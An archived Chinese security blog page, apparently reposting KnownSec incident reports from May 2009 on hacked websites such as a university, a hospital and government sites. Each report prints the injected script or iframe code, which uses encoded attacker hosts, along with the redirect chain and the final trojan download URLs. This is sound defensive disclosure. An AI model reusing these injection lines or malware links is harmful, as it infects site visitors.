This theme is downloaded from wordpress themes website.

Archive for May, 2009

中国民盟泰安市委员会被植入恶意代码

发布时间:Sat May 30 2009 19:01:30 UTC+0800
最后更新时间:Sat May 30 2009 19:01:30 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中国民盟泰安市委员会(http://www.tamm.org.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.tamm.org.cn/

网页被嵌入恶意链接代码:

090530snap2.jpg

<script language=javascript src=http://%77%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script><script language=javascript src=http://%70%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>
挂马分析:
[wide]http://www.tamm.org.cn/
 [script]http://%77%2e%39%34%73%61%6f%6d%6d%2e%63%6f%6d/js.js
  [frame]http://jizhouhx.com/mj/360.htm
   [frame]http://jizhouhx.com/mj/x.htm
    [cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
    [script]http://jizhouhx.com/mj/all.css
    [frame]http://jizhouhx.com/mj/1.htm
    [frame]http://jizhouhx.com/mj/newlz.htm
    [frame]http://jizhouhx.com/mj/s.htm
    [frame]http://jizhouhx.com/mj/office.htm
    [frame]http://jizhouhx.com/mj/bf.htm
    [frame]http://jizhouhx.com/mj/cx.htm
    [frame]http://jizhouhx.com/mj/2.htm
    [frame]http://jizhouhx.com/mj/pp.htm
    [frame]http://jizhouhx.com/mj/7.htm
   [script]http://js.tongji.cn.yahoo.com/806392/ystat.js
 [script]http://%70%2e%39%34%73%61%6f%6d%6d%2e%63%6f%6d/js.js
最终下载病毒文件:
http://mybr.xl.cx/v.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 7% [?]

网站挂马记录 lk 30 May 2009 No Comments

91china被植入恶意代码

发布时间:Sat May 30 2009 18:57:28 UTC+0800
最后更新时间:Sat May 30 2009 18:57:28 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 91china(http://www.91china.net/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.91china.net/player/imgchg.js

网页被嵌入恶意链接代码:

090530snap1.jpg

document.writeln(”<iframe src=http:\/\/wori2244.3322.org\/a\/a1a.htm?2 width=50 height=0><\/iframe> “);
挂马分析:
[wide]http://www.91china.net/player/imgchg.js
 [frame]http://wori2244.3322.org/a/a1a.htm?2
  [frame]http://wori2244.3322.org/a/163.htm
   [frame]http://wori2244.3322.org/a/ggqm.htm
   [script]http://wori2244.3322.org/a/js.js
    [frame]http://wori2244.3322.org/a/gg14.htm
    [frame]http://wori2244.3322.org/a/ggfl.htm
    [frame]http://wori2244.3322.org/a/ggff.htm
    [frame]http://wori2244.3322.org/a/z.htm
    [frame]http://wori2244.3322.org/a/ggvod.htm
    [frame]http://wori2244.3322.org/a/ytxxz.htm
    [frame]http://wori2244.3322.org/a/gglb.htm
    [frame]http://wori2244.3322.org/a/ggr.htm
  [script]http://js.tongji.cn.yahoo.com/1081870/ystat.js
  [script]http://s56.cnzz.com/stat.php?id=1408266&web_id=1408266
最终下载病毒文件:
http://cccv321.3322.org/activex.exe
http://woaini23456.com/web/xp.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 7% [?]

网站挂马记录 lk 30 May 2009 No Comments

淄博信息港被植入恶意代码

发布时间:Fri May 29 2009 20:37:47 UTC+0800
最后更新时间:Fri May 29 2009 20:37:47 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 淄博信息港(http://www.zbinfo.net/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://hit.zbinfo.net/ts/001/index.html

网页被嵌入恶意链接代码:

090529snap3.jpg

<script src=http://%77%76%67%32%2E%63%6E></script>
挂马分析:
[wide]http://hit.zbinfo.net/ts/001/index.html
 [script]http://%77%76%67%32%2e%63%6e
  [frame]http://31t.3322.org/a/a4.htm?5
   [frame]http://31t.3322.org/a/163.htm
    [frame]http://31t.3322.org/a/ggqm.htm
    [script]http://31t.3322.org/a/js.js
     [frame]http://31t.3322.org/a/gg14.htm
     [frame]http://31t.3322.org/a/ggfl.htm
     [frame]http://31t.3322.org/a/ggff.htm
     [frame]http://31t.3322.org/a/z.htm
     [frame]http://31t.3322.org/a/ggvod.htm
     [frame]http://31t.3322.org/a/ytxxz.htm
     [frame]http://31t.3322.org/a/gglb.htm
     [frame]http://31t.3322.org/a/ggr.htm
   [script]http://js.tongji.cn.yahoo.com/1081637/ystat.js
   [script]http://s6.cnzz.com/stat.php?id=1408285&web_id=1408285
最终下载病毒文件:
http://feilia.3322.org/activex.exe
http://woaini23456.com/web/xp.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 9% [?]

网站挂马记录 lk 29 May 2009 No Comments

中华宠物网被植入恶意代码

发布时间:Fri May 29 2009 20:33:26 UTC+0800
最后更新时间:Fri May 29 2009 20:33:26 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中华宠物网(http://www.petbbs.net/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.petbbs.net/include/js/common.js?628

网页被嵌入恶意链接代码:

090529snap2.jpg

document.writeln(”<iframe height=\”0\” width=\”50\” src=\”http:\/\/www.12966.com.cn\/bao3\/y.htm?a008\”><\/iframe>”);
挂马分析:
[wide]http://www.petbbs.net/
 [script]http://www.petbbs.net/include/js/common.js?628
  [frame]http://www.12966.com.cn/bao3/y.htm?a008
   [frame]http://www.12966.com.cn/bao3/index.htm
    [frame]http://www.12966.com.cn/bao3/yy.htm
    [frame]http://www.12966.com.cn/bao3/flash.htm
    [frame]http://www.12966.com.cn/bao3/ippp.htm
    [frame]http://www.12966.com.cn/bao3/ip.htm
    [frame]http://www.12966.com.cn/bao3/02.htm
    [frame]http://www.12966.com.cn/bao3/lz.htm
    [frame]http://www.12966.com.cn/bao3/office.htm
    [frame]http://www.12966.com.cn/bao3/pef.htm
    [frame]http://www.12966.com.cn/bao3/qb.htm
   [script]http://count1.51much.com/cnt.php?uid=ua-1-13307&style=text&text=.
最终下载病毒文件:
http://www.53299.com.cn/bao.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 7% [?]

网站挂马记录 lk 29 May 2009 No Comments

东北师范大学被植入恶意代码

发布时间:Fri May 29 2009 20:28:40 UTC+0800
最后更新时间:Fri May 29 2009 20:28:40 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 东北师范大学(http://www.nenu.edu.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://youth.nenu.edu.cn/tw/08/readnews.asp

网页被嵌入恶意链接代码:

090529snap1.jpg

<script language=javascript src=http://%70%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>
挂马分析:
[wide]http://youth.nenu.edu.cn/tw/08/readnews.asp
 [script]http://%70%2e%39%34%73%61%6f%6d%6d%2e%63%6f%6d/js.js
  [frame]http://www.bjhh.cn/cn/360.htm
   [frame]http://www.bjhh.cn/cn/x.htm
    [script]http://www.bjhh.cn/cn/all.css
    [frame]http://www.bjhh.cn/cn/1.htm
    [frame]http://www.bjhh.cn/cn/newlz.htm
    [frame]http://www.bjhh.cn/cn/s.htm
    [frame]http://www.bjhh.cn/cn/office.htm
    [frame]http://www.bjhh.cn/cn/bf.htm
    [frame]http://www.bjhh.cn/cn/cx.htm
    [frame]http://www.bjhh.cn/cn/2.htm
    [frame]http://www.bjhh.cn/cn/p.htm
    [frame]http://www.bjhh.cn/cn/7.htm
   [script]http://js.tongji.cn.yahoo.com/806392/ystat.js
最终下载病毒文件:
http://www.ccttv.qc.cx/v.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 29 May 2009 No Comments

珠海市人民医院被植入恶意代码

发布时间:Thu May 28 2009 17:58:09 UTC+0800
最后更新时间:Thu May 28 2009 17:58:09 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 珠海市人民医院(http://www.zhhospital.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.zhhospital.cn/

网页被嵌入恶意链接代码:

090528snap3.jpg

<script src=http://%77%76%67%34%2E%63%6E></script>
挂马分析:
[wide]http://www.zhhospital.cn/
 [script]http://%77%76%67%34%2e%63%6e
  [frame]http://29v.3322.org/a/a4.htm?5
   [frame]http://29v.3322.org/a/163.htm
    [frame]http://29v.3322.org/a/ggqm.htm
    [script]http://29v.3322.org/a/js.js
     [frame]http://29v.3322.org/a/gg14.htm
     [frame]http://29v.3322.org/a/ggfl.htm
     [frame]http://29v.3322.org/a/ggff.htm
     [frame]http://29v.3322.org/a/z.htm
     [frame]http://29v.3322.org/a/ggvod.htm
     [frame]http://29v.3322.org/a/ytxxz.htm
     [frame]http://29v.3322.org/a/gglb.htm
     [frame]http://29v.3322.org/a/ggr.htm
   [script]http://js.tongji.cn.yahoo.com/1081637/ystat.js
   [script]http://s6.cnzz.com/stat.php?id=1408285&web_id=1408285
最终下载病毒文件:
http://niaiwo234.3322.org/activex.exe
http://woaini23456.com/web/xp.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 28 May 2009 No Comments

北京外国语大学亚非学院被植入恶意代码

发布时间:Thu May 28 2009 17:55:13 UTC+0800
最后更新时间:Thu May 28 2009 17:55:13 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 北京外国语大学亚非学院(http://aa.bfsu.edu.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://aa.bfsu.edu.cn/

网页被嵌入恶意链接代码:

090528snap2.jpg

<script src=http://zsb.lyge.cn/z.js></script>
挂马分析:
[wide]http://aa.bfsu.edu.cn/
 [script]http://zsb.lyge.cn/z.js
  [frame]http://erdfy.cn:338/a0036159/a03.htm
   [frame]http://erdfy.cn:338/a0036159/new.html
    [script]http://erdfy.cn:338/a0036159/../xnnn.js
    [script]http://erdfy.cn:338/a0036159/../zhin.js
    [frame]http://erdfy.cn:338/a0036159/../apple4.htm
    [frame]http://erdfy.cn:338/a0036159/fx.htm
    [frame]http://erdfy.cn:338/a0036159/../active.htm
    [frame]http://erdfy.cn:338/a0036159/../cx.htm
    [frame]http://erdfy.cn:338/a0036159/../real10.htm
    [frame]http://erdfy.cn:338/a0036159/../real11.htm
    [script]http://erdfy.cn:338/a0036159/../wewew.js
   [script]http://count7.51much.com/cnt.php?uid=ua-1-13197&style=text&text=网站统计
最终下载病毒文件:
http://c0jm.com:333/neww/lzz.css
http://c0jm.com:333/neww/as.css
http://c0jm.com:333/neww/bf.css
http://c0jm.com:333/neww/ms.css
http://c0DSm.com:333/neww/adr.css
http://c0jm.com:333/neww/re.css
http://c0jm.com:333/neww/real11.css
http://c0jm.com:333/Baidu.cab

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 28 May 2009 No Comments

乌鲁木齐市红十字会被植入恶意代码

发布时间:Thu May 28 2009 17:45:25 UTC+0800
最后更新时间:Thu May 28 2009 17:45:25 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 乌鲁木齐市红十字会(http://www.wlredcross.org.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.wlredcross.org.cn/news/list.asp?id=824

网页被嵌入恶意链接代码:

090528snap1.jpg

<script language=”javascript” src=”http://officeon.viens.la/office.js?google_ad_format=728×90_as”></script>
挂马分析:
[wide]http://www.wlredcross.org.cn/news/list.asp?id=824
 [script]http://officeon.viens.la/office.js?google_ad_format=728×90_as
  [frame]http://4trgreev.cn/09/0009.htm
   [frame]http://4trgreev.cn/09/index.html
    [script]http://4trgreev.cn/09/js.js
     [frame]http://4trgreev.cn/09/xyqm.htm
     [frame]http://4trgreev.cn/09/xy14.htm
     [frame]http://4trgreev.cn/09/xyfl.htm
     [frame]http://4trgreev.cn/09/xyff.htm
     [frame]http://4trgreev.cn/09/z.htm
     [frame]http://4trgreev.cn/09/xyvod.htm
     [frame]http://4trgreev.cn/09/xyxxz.htm
     [frame]http://4trgreev.cn/09/ytlb.htm
     [frame]http://4trgreev.cn/09/xy122121.htm
   [script]http://js.tongji.cn.yahoo.com/1103419/ystat.js
  [frame]http://4trgreev.cn/09/0009.htm
  [frame]http://4trgreev.cn/09/0009.htm
  [frame]http://4trgreev.cn/09/0009.htm
  [frame]http://4trgreev.cn/09/0009.htm
  [frame]http://4trgreev.cn/09/0009.htm
  [frame]http://4trgreev.cn/09/0009.htm
  [frame]http://officeon.viens.la/about:blank
  [frame]http://ddv.sarl.tk/cnzz1.html
  [frame]http://count41.51yes.com/sa.aspx?id=419175949&amp;refe=
最终下载病毒文件:
http://9xddw2.cn/9.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 7% [?]

网站挂马记录 lk 28 May 2009 No Comments

邵东档案-信息网被植入恶意代码

发布时间:Tue May 26 2009 21:17:04 UTC+0800
最后更新时间:Tue May 26 2009 21:17:04 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 邵东档案-信息网(http://www.hnsdda.gov.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.hnsdda.gov.cn/

网页被嵌入恶意链接代码:

090526snap4.jpg

<script language=javascript src=http://%62%2E%6C%69%61%6F%37%37%34%39%2E%63%6F%6D/js.js></script>
挂马分析:
[wide]http://www.hnsdda.gov.cn/
 [script]http://%62%2e%6c%69%61%6f%37%37%34%39%2e%63%6f%6d/js.js
  [frame]http://chinaseohome.com/new/360.htm
   [frame]http://chinaseohome.com/new/x.htm
    [script]http://chinaseohome.com/new/all.css
    [frame]http://chinaseohome.com/new/1.htm
    [frame]http://chinaseohome.com/new/newlz.htm
    [frame]http://chinaseohome.com/new/s.htm
    [frame]http://chinaseohome.com/new/office.htm
    [frame]http://chinaseohome.com/new/bf.htm
    [frame]http://chinaseohome.com/new/cx.htm
    [frame]http://chinaseohome.com/new/2.htm
    [frame]http://chinaseohome.com/new/7.htm
   [script]http://js.tongji.cn.yahoo.com/806392/ystat.js
最终下载病毒文件:
http://www.bs360.xl.cx/bb.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 7% [?]

网站挂马记录 lk 26 May 2009 No Comments

江都市司法行政网被植入恶意代码

发布时间:Tue May 26 2009 21:13:55 UTC+0800
最后更新时间:Tue May 26 2009 21:13:55 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 江都市司法行政网(http://www.sf.jd.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.sf.jd.cn/

网页被嵌入恶意链接代码:

090526snap3.jpg

<script type=”text/javascript” src=”http://g.jd.cn/bjgt/bjgt.htm”></script><script src=http://%77%76%67%32%2E%63%6E></script><script src=http://%77%76%67%34%2E%63%6E></script>
挂马分析:
[wide]http://www.sf.jd.cn/
 [script]http://%77%76%67%32%2e%63%6e
  [frame]http://28a.3322.org/a/a4.htm?5
   [frame]http://28a.3322.org/a/163.htm
    [script]http://28a.3322.org/a/js.js
     [frame]http://28a.3322.org/a/gg14.htm
     [frame]http://28a.3322.org/a/ggfl.htm
     [frame]http://28a.3322.org/a/ggff.htm
     [frame]http://28a.3322.org/a/ggvod.htm
     [frame]http://28a.3322.org/a/z.htm
     [frame]http://28a.3322.org/a/e.htm
     [frame]http://28a.3322.org/a/ggbb.htm
     [frame]http://28a.3322.org/a/ggr.htm
    [frame]http://28a.3322.org/a/ggqm.htm
   [script]http://js.tongji.cn.yahoo.com/1081637/ystat.js
   [script]http://s6.cnzz.com/stat.php?id=1408285&web_id=1408285
 [script]http://%77%76%67%34%2e%63%6e
最终下载病毒文件:
http://mai2828.3322.org/web/activex.exe
http://exe316.com/web/xp.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 26 May 2009 No Comments

Next Page »

Recommended: Buy movies online.